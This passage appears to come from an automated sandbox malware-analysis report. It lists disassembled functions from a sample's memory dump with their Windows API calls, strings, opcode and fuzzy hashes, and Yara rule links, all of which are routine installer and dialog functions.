                                                            • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                            • Instruction Fuzzy Hash: 3E512471600B4657DFB44AA88976BFE27DB9B53340F1C091DE882DF683CA1BEE458352
                                                            Function 000502D7 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4771fffb9a404dadfa5b877f34f0fc5ae71c2a7f3daab0b6f54b3c334722aa8c
                                                            • Instruction ID: 905ae9a97c6f2f0abeb09507d2328e4708394e83eaecdecec106a6cb2349711b
                                                            • Opcode Fuzzy Hash: 4771fffb9a404dadfa5b877f34f0fc5ae71c2a7f3daab0b6f54b3c334722aa8c
                                                            • Instruction Fuzzy Hash: 3051E0715093D58FCB02CF2881805AFBFE4AF9A315F4909A9E8D95B243C230DB4ECB52
                                                            Function 000513D6 Relevance: .1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5b63b5dc1d76b5447171c3b0a90f0f846b7e15e6c80ee8ee05e7cd2ff87bbe8
                                                            • Instruction ID: dfab3c57a0074cd08c08a522a0a64887711158d5b446deced52fe86dd45e35e2
                                                            • Opcode Fuzzy Hash: a5b63b5dc1d76b5447171c3b0a90f0f846b7e15e6c80ee8ee05e7cd2ff87bbe8
                                                            • Instruction Fuzzy Hash: 7151E0B1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3741D734EA59CB96
                                                            Function 00054FE1 Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
                                                            • Instruction ID: 9556ea084ffdc3e769edad0e73725055fc8a42cef7dae304ceb5c610a0c70669
                                                            • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
                                                            • Instruction Fuzzy Hash: F731D3B1604B168FC714DF28CCA11ABBBD0EB95306F10492DE896C7742C735E959CB91
                                                            Function 0005D701 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0005D706
                                                              • Part of subcall function 0005C3A4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0005C48B
                                                            • _wcslen.LIBCMT ref: 0005D9CC
                                                            • _wcslen.LIBCMT ref: 0005D9D5
                                                            • SetWindowTextW.USER32(?,?), ref: 0005DA33
                                                            • _wcslen.LIBCMT ref: 0005DA75
                                                            • _wcsrchr.LIBVCRUNTIME ref: 0005DBBD
                                                            • GetDlgItem.USER32(?,00000066), ref: 0005DBF8
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0005DC08
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0009389A), ref: 0005DC16
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0005DC41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: d2fe6cd60c4d2eef43a4053a2a2a2462d73108202b93ac63386921afec67e37f
                                                            • Instruction ID: 9ad7a4d4fdd7f20781ddecd82de43329a4b80ff452fc054b16c910f19bfab412
                                                            • Opcode Fuzzy Hash: d2fe6cd60c4d2eef43a4053a2a2a2462d73108202b93ac63386921afec67e37f
                                                            • Instruction Fuzzy Hash: 1AE16472904258AADF249B60DC85EEF77BDAF04351F4440A7FA49E3041EB749F888B64
                                                            Function 0004F5E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0004F60E
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                              • Part of subcall function 000530C5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00083070,?,0004EC28,00000000,?,00000050,00083070), ref: 000530E2
                                                            • _strlen.LIBCMT ref: 0004F62F
                                                            • SetDlgItemTextW.USER32(?,00080274,?), ref: 0004F68F
                                                            • GetWindowRect.USER32(?,?), ref: 0004F6C9
                                                            • GetClientRect.USER32(?,?), ref: 0004F6D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0004F775
                                                            • GetWindowRect.USER32(?,?), ref: 0004F7A2
                                                            • SetWindowTextW.USER32(?,?), ref: 0004F7DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 0004F7E3
                                                            • GetWindow.USER32(?,00000005), ref: 0004F7EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 0004F81B
                                                            • GetWindow.USER32(00000000,00000002), ref: 0004F88D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            • Opcode ID: b39794b0e70d7032cb099451d64a4177a4b5468883eadf55984a45b2c61772e7
                                                            • Instruction ID: 6445dbe07b791044ea27f27ee5922898723d93b0c02aee76a55b17cb184e54d0
                                                            • Opcode Fuzzy Hash: b39794b0e70d7032cb099451d64a4177a4b5468883eadf55984a45b2c61772e7
                                                            • Instruction Fuzzy Hash: E5819FB2608701AFD710DF68CD89A7FBBE9FB89704F04092DFA8497251D674E8098B56
                                                            Function 0006DB32 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0006DB76
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D72E
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D740
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D752
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D764
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D776
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D788
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D79A
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7AC
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7BE
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7D0
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7E2
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7F4
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D806
                                                            • _free.LIBCMT ref: 0006DB6B
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 0006DB8D
                                                            • _free.LIBCMT ref: 0006DBA2
                                                            • _free.LIBCMT ref: 0006DBAD
                                                            • _free.LIBCMT ref: 0006DBCF
                                                            • _free.LIBCMT ref: 0006DBE2
                                                            • _free.LIBCMT ref: 0006DBF0
                                                            • _free.LIBCMT ref: 0006DBFB
                                                            • _free.LIBCMT ref: 0006DC33
                                                            • _free.LIBCMT ref: 0006DC3A
                                                            • _free.LIBCMT ref: 0006DC57
                                                            • _free.LIBCMT ref: 0006DC6F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 61c351c72bf9d3cbbfec7404cca60ee6a870e8c7847088c0e4b251910f3c5c3f
                                                            • Instruction ID: 73c58347f7b491ae226694b373778ddece632f8e3bd5e0c8e8f055137f94c252
                                                            • Opcode Fuzzy Hash: 61c351c72bf9d3cbbfec7404cca60ee6a870e8c7847088c0e4b251910f3c5c3f
                                                            • Instruction Fuzzy Hash: 8C313D31B00605DFEB60AA39DC45B9673EBBF81320F14842AE499E7152DFB5EC40CB21
                                                            Function 0005E66E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 0005E691
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 0005E6BD
                                                              • Part of subcall function 000532E6: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000132E6,0004D503,00000000,.exe,?,?,00000800,?,?,?,00059E2C), ref: 000532FC
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0005E6D9
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0005E6F0
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0005E704
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0005E72D
                                                            • DeleteObject.GDI32(00000000), ref: 0005E734
                                                            • GetWindow.USER32(00000000,00000002), ref: 0005E73D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: b7abec50ceb5a08a833d8fcdc7bb99250d276d4f715ef12adea49234f3c004b6
                                                            • Instruction ID: 61153ead9070137fbbbf0c1c6f01024e3673abf2b509dd9d798bccbb63995b95
                                                            • Opcode Fuzzy Hash: b7abec50ceb5a08a833d8fcdc7bb99250d276d4f715ef12adea49234f3c004b6
                                                            • Instruction Fuzzy Hash: 99112132508F547BF2616B70DC4AFEF369CBF59713F008421FE81A9093DB688A0D46A5
                                                            Function 0006A271 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0006A285
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 0006A291
                                                            • _free.LIBCMT ref: 0006A29C
                                                            • _free.LIBCMT ref: 0006A2A7
                                                            • _free.LIBCMT ref: 0006A2B2
                                                            • _free.LIBCMT ref: 0006A2BD
                                                            • _free.LIBCMT ref: 0006A2C8
                                                            • _free.LIBCMT ref: 0006A2D3
                                                            • _free.LIBCMT ref: 0006A2DE
                                                            • _free.LIBCMT ref: 0006A2EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: abe211173ba0f0e78ec5d88d4827a281f37e8e6de31ad5560505355908ae48a5
                                                            • Instruction ID: 2bd2a74d634b25b854be6489cbd0ee828e5e432d8fca5810b54dfb455e17df06
                                                            • Opcode Fuzzy Hash: abe211173ba0f0e78ec5d88d4827a281f37e8e6de31ad5560505355908ae48a5
                                                            • Instruction Fuzzy Hash: 56119376610108AFCB01FF94CC56CDD3BA7EF46350B0180A1FA089F222DA75DA519FA2
                                                            Function 00063E11 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: 00286c645da479f83748a243818fafd0d5f00bf4eec02379b69f3e9c823f7ac3
                                                            • Instruction ID: bc4c994273763ff14122c0e8013fe00e5f5751da9bf036e398d1443f5fd88c79
                                                            • Opcode Fuzzy Hash: 00286c645da479f83748a243818fafd0d5f00bf4eec02379b69f3e9c823f7ac3
                                                            • Instruction Fuzzy Hash: D2B18971C00219EFCF29DFA4C8819AEBBB6FF15310F14456AE9146B242D731EA51CFA2
                                                            Function 0005A6A1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0005A6C6
                                                            • _wcslen.LIBCMT ref: 0005A766
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0005A775
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0005A796
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1116704506-4209811716
                                                            • Opcode ID: 68db52e36704d1bca792d0fe8635674bdce5946e50ac403c8573a3edc9d4ce30
                                                            • Instruction ID: 336a573a3de7d672b1d37f7bc4a57c2677c5e0a9a78844a2599a8c4d7eff8243
                                                            • Opcode Fuzzy Hash: 68db52e36704d1bca792d0fe8635674bdce5946e50ac403c8573a3edc9d4ce30
                                                            • Instruction Fuzzy Hash: 9C3137326087157FE724AB309C46FAF77ACEF46712F14021EF901961C2EF68990883A6
                                                            Function 0005C650 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • EndDialog.USER32(?,00000001), ref: 0005C6A0
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005C6C7
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0005C6E0
                                                            • SetWindowTextW.USER32(?,?), ref: 0005C6F1
                                                            • GetDlgItem.USER32(?,00000065), ref: 0005C6FA
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0005C70E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0005C724
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: c45debaabde5d4c24c97c3c2d90904a8a622b4091f879ea8edcb7ef8e020fad5
                                                            • Instruction ID: 101f0c48c64e5626ecf30f55eb36e41e4dff5bd2c1b5030140dce2773d2bdf42
                                                            • Opcode Fuzzy Hash: c45debaabde5d4c24c97c3c2d90904a8a622b4091f879ea8edcb7ef8e020fad5
                                                            • Instruction Fuzzy Hash: 0321B532244B05BFF2215B65EC49FBB3BACFB4BB93F014014FA40A11A1CB6A99059776
                                                            Function 0004B5B6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0004B5C2
                                                              • Part of subcall function 000526D1: GetSystemTime.KERNEL32(?), ref: 000526DF
                                                              • Part of subcall function 000526D1: SystemTimeToFileTime.KERNEL32(?,?), ref: 000526ED
                                                              • Part of subcall function 0005267A: __aulldiv.LIBCMT ref: 00052683
                                                            • __aulldiv.LIBCMT ref: 0004B5EE
                                                            • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0004B5F5
                                                            • _swprintf.LIBCMT ref: 0004B620
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • _wcslen.LIBCMT ref: 0004B62A
                                                            • _swprintf.LIBCMT ref: 0004B680
                                                            • _wcslen.LIBCMT ref: 0004B68A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                            • String ID: %u.%03u
                                                            • API String ID: 2956649372-1114938957
                                                            • Opcode ID: ed16d30bb734b8e5c908792b94597c5cc02572fe1b1f98b2f91c856d55d1c99e
                                                            • Instruction ID: f8dab463d0aac03997a8c95e02e9ce4041307580099514d67f4716cb1fc5d696
                                                            • Opcode Fuzzy Hash: ed16d30bb734b8e5c908792b94597c5cc02572fe1b1f98b2f91c856d55d1c99e
                                                            • Instruction Fuzzy Hash: 2F217FB2A043006BD724EF64DC85DAB77DCEB94310F45492AB549D3242DA34DA0887A6
                                                            Function 0005BBFB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC0F
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0005BC20
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0005BC2E
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC3C
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005BC57
                                                            • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0005BC7E
                                                            • _swprintf.LIBCMT ref: 0005BCA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
